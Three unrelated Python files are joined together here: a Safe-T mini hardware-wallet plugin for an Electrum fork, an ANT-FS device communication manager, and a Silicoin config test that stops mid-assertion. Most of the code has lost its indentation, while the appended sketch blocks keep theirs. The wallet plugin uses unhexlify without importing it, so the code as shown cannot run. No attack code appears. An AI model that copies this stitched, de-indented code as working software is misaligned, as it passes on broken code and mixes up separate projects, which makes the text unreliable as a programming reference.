from electrum.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum.bip32 import BIP32Node
from electrum import constants
from electrum.i18n import _
from electrum.plugin import Device
from electrum.transaction import deserialize, Transaction
from electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None and not Transaction.is_segwit_input(txin):
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if constants.net.TESTNET else "CPUchain"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.InputScriptType.SPENDWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.InputScriptType.SPENDP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2wpkh', 'p2wsh'):
return self.types.OutputScriptType.PAYTOWITNESS
if electrum_txin_type in ('p2wpkh-p2sh', 'p2wsh-p2sh'):
return self.types.OutputScriptType.PAYTOP2SHWITNESS
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
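
# Reference sketch (not used by the plugin itself): the electrum txin-type to
# Safe-T script-type mapping implemented by get_safet_input_script_type() and
# get_safet_output_script_type() above, written out as plain data for clarity.
SAFET_SCRIPT_TYPES_EXAMPLE = {
    # electrum txin type: (input script type, output script type)
    'p2pkh': ('SPENDADDRESS', 'PAYTOADDRESS'),
    'p2sh': ('SPENDMULTISIG', 'PAYTOMULTISIG'),
    'p2wpkh': ('SPENDWITNESS', 'PAYTOWITNESS'),
    'p2wsh': ('SPENDWITNESS', 'PAYTOWITNESS'),
    'p2wpkh-p2sh': ('SPENDP2SHWITNESS', 'PAYTOP2SHWITNESS'),
    'p2wsh-p2sh': ('SPENDP2SHWITNESS', 'PAYTOP2SHWITNESS'),
}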
|
manager.py
|
# Ant-FS
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from __future__ import absolute_import, print_function, division
import array
import datetime
import logging
import threading
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
from ant.easy.channel import Channel
from ant.easy.node import Node, Message
import ant.fs.command
from ant.fs.beacon import Beacon
from ant.fs.command import (LinkCommand, DownloadRequest, DownloadResponse,
AuthenticateCommand, AuthenticateResponse, DisconnectCommand,
UploadRequest, UploadResponse, UploadDataCommand, UploadDataResponse,
EraseRequestCommand, EraseResponse)
from ant.fs.commandpipe import CreateFile, Response, Time, TimeResponse
from ant.fs.file import Directory
from ant.fs.commons import crc
_logger = logging.getLogger("ant.fs.manager")
class AntFSException(Exception):
def __init__(self, error, errno=None):
Exception.__init__(self, error, errno)
self._error = error
self._errno = errno
def get_error(self):
if self._errno is not None:
return str(self._errno) + ": " + self._error
else:
return self._error
class AntFSDownloadException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class AntFSUploadException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class AntFSEraseException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class AntFSAuthenticationException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class AntFSCreateFileException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class AntFSTimeException(AntFSException):
def __init__(self, error, errno=None):
AntFSException.__init__(self, error, errno)
class Application:
_serial_number = 1337
    _frequency = 19     # 0 to 124; RF frequency is (2400 + x) MHz
def __init__(self):
self._queue = queue.Queue()
self._beacons = queue.Queue()
self._node = Node()
try:
NETWORK_KEY = [0xa8, 0xa4, 0x23, 0xb9, 0xf5, 0x5e, 0x63, 0xc1]
self._node.set_network_key(0x00, NETWORK_KEY)
print("Request basic information...")
m = self._node.request_message(Message.ID.RESPONSE_CAPABILITIES)
print(" Capabilities: ", m[2])
# m = self._node.request_message(Message.ID.RESPONSE_ANT_VERSION)
# print " ANT version: ", struct.unpack("<10sx", m[2])[0]
#m = self._node.request_message(Message.ID.RESPONSE_SERIAL_NUMBER)
#print " Serial number:", struct.unpack("<I", m[2])[0]
print("Starting system...")
#NETWORK_KEY= [0xa8, 0xa4, 0x23, 0xb9, 0xf5, 0x5e, 0x63, 0xc1]
#self._node.set_network_key(0x00, NETWORK_KEY)
print("Key done...")
self._channel = self._node.new_channel(Channel.Type.BIDIRECTIONAL_RECEIVE)
self._channel.on_broadcast_data = self._on_data
self._channel.on_burst_data = self._on_data
self.setup_channel(self._channel)
self._worker_thread = threading.Thread(target=self._worker, name="ant.fs")
self._worker_thread.start()
except Exception as e:
self.stop()
raise e
def _worker(self):
self._node.start()
def _main(self):
try:
_logger.debug("Link level")
beacon = self._get_beacon()
if self.on_link(beacon):
for i in range(0, 5):
beacon = self._get_beacon()
if beacon.get_client_device_state() == Beacon.ClientDeviceState.AUTHENTICATION:
_logger.debug("Auth layer")
if self.on_authentication(beacon):
_logger.debug("Authenticated")
beacon = self._get_beacon()
self.on_transport(beacon)
self.disconnect()
break
finally:
_logger.debug("Run 5")
self.stop()
def _on_beacon(self, data):
b = Beacon.parse(data)
self._beacons.put(b)
def _on_command(self, data):
c = ant.fs.command.parse(data)
self._queue.put(c)
def _on_data(self, data):
# print "_on_data", data, len(data)
if data[0] == 0x43:
self._on_beacon(data[:8])
if len(data[8:]) > 0:
self._on_command(data[8:])
elif data[0] == 0x44:
self._on_command(data)
def _get_beacon(self):
b = self._beacons.get()
self._beacons.task_done()
return b
def _get_command(self, timeout=15.0):
_logger.debug("Get command, t%d, s%d", timeout, self._queue.qsize())
c = self._queue.get(True, timeout)
self._queue.task_done()
return c
def _send_command(self, c):
data = c.get()
if len(data) == 8:
self._channel.send_acknowledged_data(data)
else:
self._channel.send_burst_transfer(data)
# Application actions are defined from here
# =======================================================================
# These should be overloaded:
def setup_channel(self, channel):
pass
def on_link(self, beacon):
pass
def on_authentication(self, beacon):
pass
def on_transport(self, beacon):
pass
# Shouldn't have to touch these:
def start(self):
self._main()
def stop(self):
self._node.stop()
def _send_commandpipe(self, data):
# print "send commandpipe", data
self.upload(0xfffe, data)
def _get_commandpipe(self):
# print "get commandpipe"
return ant.fs.commandpipe.parse(self.download(0xfffe))
def create(self, typ, data, callback=None):
# print "create", typ
request = CreateFile(len(data), 0x80, [typ, 0x00, 0x00], [0x00, 0xff, 0xff])
self._send_commandpipe(request.get())
result = self._get_commandpipe()
# result._debug()
if result.get_response() != Response.Response.OK:
raise AntFSCreateFileException("Could not create file",
result.get_response())
# print "create result", result, result.get_index(), result.get_data_type(), result.get_identifier()
# d = self.download_directory()
# Inform the application that the upload request was successfully created
if callback is not None:
callback(0)
self.upload(result.get_index(), data, callback)
return result.get_index()
def upload(self, index, data, callback=None):
# print "upload", index, len(data)
iteration = 0
while True:
# Request Upload
# Continue using Last Data Offset (special MAX_ULONG value)
request_offset = 0 if iteration == 0 else 0xffffffff
self._send_command(UploadRequest(index, len(data), request_offset))
upload_response = self._get_command()
# upload_response._debug()
if upload_response._get_argument("response") != UploadResponse.Response.OK:
raise AntFSUploadException("Upload request failed",
upload_response._get_argument("response"))
# Upload data
offset = upload_response._get_argument("last_data_offset")
max_block = upload_response._get_argument("maximum_block_size")
# print " uploading", offset, "to", offset + max_block
data_packet = data[offset:offset + max_block]
crc_seed = upload_response._get_argument("crc")
            crc_val = crc(data_packet, crc_seed)
# Pad with 0 to even 8 bytes
missing_bytes = 8 - (len(data_packet) % 8)
if missing_bytes != 8:
data_packet.extend(array.array('B', [0] * missing_bytes))
# print " adding", str(missing_bytes), "padding"
# print " packet", len(data_packet)
# print " crc ", crc_val, "from seed", crc_seed
self._send_command(UploadDataCommand(crc_seed, offset, data_packet, crc_val))
upload_data_response = self._get_command()
# upload_data_response._debug()
if upload_data_response._get_argument("response") != UploadDataResponse.Response.OK:
raise AntFSUploadException("Upload data failed",
upload_data_response._get_argument("response"))
if callback is not None and len(data) != 0:
callback((offset + len(data_packet)) / len(data))
if offset + len(data_packet) >= len(data):
# print " done"
break
# print " one more"
iteration += 1
def download(self, index, callback=None):
offset = 0
initial = True
crc = 0
data = array.array('B')
while True:
_logger.debug("Download %d, o%d, c%d", index, offset, crc)
self._send_command(DownloadRequest(index, offset, True, crc))
_logger.debug("Wait for response...")
try:
response = self._get_command()
if response._get_argument("response") == DownloadResponse.Response.OK:
remaining = response._get_argument("remaining")
offset = response._get_argument("offset")
total = offset + remaining
data[offset:total] = response._get_argument("data")[:remaining]
# print "rem", remaining, "offset", offset, "total", total, "size", response._get_argument("size")
# TODO: check CRC
if callback is not None and response._get_argument("size") != 0:
callback(total / response._get_argument("size"))
if total == response._get_argument("size"):
return data
crc = response._get_argument("crc")
offset = total
else:
raise AntFSDownloadException("Download request failed: ",
response._get_argument("response"))
except queue.Empty:
_logger.debug("Download %d timeout", index)
# print "recover from download failure"
def download_directory(self, callback=None):
data = self.download(0, callback)
return Directory.parse(data)
    def set_time(self, time=None):
        """
        :param time: datetime in UTC, or None to set to the current time
        """
        if time is None:
            time = datetime.datetime.utcnow()
utc_tai_diff_seconds = 35
offset = time - datetime.datetime(1989, 12, 31, 0, 0, 0)
t = Time(int(offset.total_seconds()) + utc_tai_diff_seconds, 0xffffffff, 0)
self._send_commandpipe(t.get())
result = self._get_commandpipe()
if result.get_response() != TimeResponse.Response.OK:
raise AntFSTimeException("Failed to set time", result.get_response())
def erase(self, index):
self._send_command(EraseRequestCommand(index))
response = self._get_command()
if response._get_argument("response") != EraseResponse.Response.ERASE_SUCCESSFUL:
raise AntFSDownloadException("Erase request failed: ",
response._get_argument("response"))
def link(self):
self._channel.request_message(Message.ID.RESPONSE_CHANNEL_ID)
self._send_command(LinkCommand(self._frequency, 4, self._serial_number))
# New period, search timeout
self._channel.set_period(4096)
self._channel.set_search_timeout(10)
self._channel.set_rf_freq(self._frequency)
def authentication_serial(self):
self._send_command(AuthenticateCommand(
AuthenticateCommand.Request.SERIAL,
self._serial_number))
response = self._get_command()
return (response.get_serial(), response.get_data_string())
def authentication_passkey(self, passkey):
self._send_command(AuthenticateCommand(
AuthenticateCommand.Request.PASSKEY_EXCHANGE,
self._serial_number, passkey))
response = self._get_command()
if response._get_argument("type") == AuthenticateResponse.Response.ACCEPT:
return response.get_data_array()
else:
raise AntFSAuthenticationException("Passkey authentication failed",
response._get_argument("type"))
def authentication_pair(self, friendly_name):
data = array.array('B', map(ord, list(friendly_name)))
self._send_command(AuthenticateCommand(
AuthenticateCommand.Request.PAIRING,
self._serial_number, data))
response = self._get_command(30)
if response._get_argument("type") == AuthenticateResponse.Response.ACCEPT:
return response.get_data_array()
else:
raise AntFSAuthenticationException("Pair authentication failed",
response._get_argument("type"))
def disconnect(self):
d = DisconnectCommand(DisconnectCommand.Type.RETURN_LINK, 0, 0)
self._send_command(d)
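
# --- Illustrative sketch (not part of ant.fs) -----------------------------------
# A minimal Application subclass showing how the link/authentication/transport
# hooks defined above fit together. The channel tuning values mirror what link()
# re-applies later and are assumptions; a real client also needs to configure and
# open the ANT channel as required by its hardware.
class ExampleApplication(Application):
    def setup_channel(self, channel):
        channel.set_period(4096)
        channel.set_search_timeout(255)
        channel.set_rf_freq(self._frequency)

    def on_link(self, beacon):
        # Returning True tells _main() to proceed to the authentication layer.
        self.link()
        return True

    def on_authentication(self, beacon):
        serial, name = self.authentication_serial()
        # A passkey or pairing exchange would normally follow here.
        return True

    def on_transport(self, beacon):
        # Download and parse the device's directory; real applications would go
        # on to download or upload individual files from here.
        return self.download_directory()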
|
test_config.py
|
import asyncio
import copy
import pytest
import random
import yaml
from silicoin.util.config import create_default_silicoin_config, initial_config_file, load_config, save_config
from silicoin.util.path import mkdir
from multiprocessing import Pool
from pathlib import Path
from threading import Thread
from time import sleep
from typing import Dict
# Commented-out lines are preserved to aid in debugging the multiprocessing tests
# import logging
# import os
# import threading
# log = logging.getLogger(__name__)
def write_config(root_path: Path, config: Dict):
"""
Wait for a random amount of time and write out the config data. With a large
config, we expect save_config() to require multiple writes.
"""
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] write_config")
# save_config(root_path=root_path, filename="config.yaml", config_data=modified_config)
save_config(root_path=root_path, filename="config.yaml", config_data=config)
def read_and_compare_config(root_path: Path, default_config: Dict):
"""
Wait for a random amount of time, read the config and compare with the
default config data. If the config file is partially-written or corrupt,
load_config should fail or return bad data
"""
# Wait a moment. The read and write threads are delayed by a random amount
# in an attempt to interleave their execution.
sleep(random.random())
# log.warning(f"[pid:{os.getpid()}:{threading.get_ident()}] read_and_compare_config")
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert len(config) > 0
# if config != default_config:
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] bad config: {config}")
# log.error(f"[pid:{os.getpid()}:{threading.get_ident()}] default config: {default_config}")
assert config == default_config
async def create_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Spin-off reader and writer threads and wait for completion
"""
thread1 = Thread(target=write_config, kwargs={"root_path": root_path, "config": default_config})
thread2 = Thread(target=read_and_compare_config, kwargs={"root_path": root_path, "default_config": default_config})
thread1.start()
thread2.start()
thread1.join()
thread2.join()
def run_reader_and_writer_tasks(root_path: Path, default_config: Dict):
"""
Subprocess entry point. This function spins-off threads to perform read/write tasks
concurrently, possibly leading to synchronization issues accessing config data.
"""
asyncio.get_event_loop().run_until_complete(create_reader_and_writer_tasks(root_path, default_config))
class TestConfig:
@pytest.fixture(scope="function")
def root_path_populated_with_config(self, tmpdir) -> Path:
"""
Create a temp directory and populate it with a default config.yaml.
Returns the root path containing the config.
"""
root_path: Path = Path(tmpdir)
create_default_silicoin_config(root_path)
return Path(root_path)
@pytest.fixture(scope="function")
def default_config_dict(self) -> Dict:
"""
Returns a dictionary containing the default config.yaml contents
"""
content: str = initial_config_file("config.yaml")
config: Dict = yaml.safe_load(content)
return config
def test_create_config_new(self, tmpdir):
"""
Test create_default_silicoin_config() as in a first run scenario
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
# Expect: config.yaml doesn't exist
assert config_file_path.exists() is False
# When: creating a new config
create_default_silicoin_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are seeded with initial contents
assert actual_content == expected_content
def test_create_config_overwrite(self, tmpdir):
"""
Test create_default_silicoin_config() when overwriting an existing config.yaml
"""
# When: using a clean directory
root_path: Path = Path(tmpdir)
config_file_path: Path = root_path / "config" / "config.yaml"
mkdir(config_file_path.parent)
# When: config.yaml already exists with content
with open(config_file_path, "w") as f:
f.write("Some config content")
# Expect: config.yaml exists
assert config_file_path.exists() is True
# When: creating a new config
create_default_silicoin_config(root_path)
# Expect: config.yaml exists
assert config_file_path.exists() is True
expected_content: str = initial_config_file("config.yaml")
assert len(expected_content) > 0
with open(config_file_path, "r") as f:
actual_content: str = f.read()
# Expect: config.yaml contents are overwritten with initial contents
assert actual_content == expected_content
def test_load_config(self, root_path_populated_with_config, default_config_dict):
"""
Call load_config() with a default config and verify a few values are set to the expected values
"""
root_path: Path = root_path_populated_with_config
# When: loading a newly created config
config: Dict = load_config(root_path=root_path, filename="config.yaml")
assert config is not None
# Expect: config values should match the defaults (from a small sampling)
assert config["daemon_port"] == default_config_dict["daemon_port"] == 56401
assert config["self_hostname"] == default_config_dict["self_hostname"] == "localhost"
assert (
config["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
== default_config_dict["farmer"]["network_overrides"]["constants"]["mainnet"]["GENESIS_CHALLENGE"]
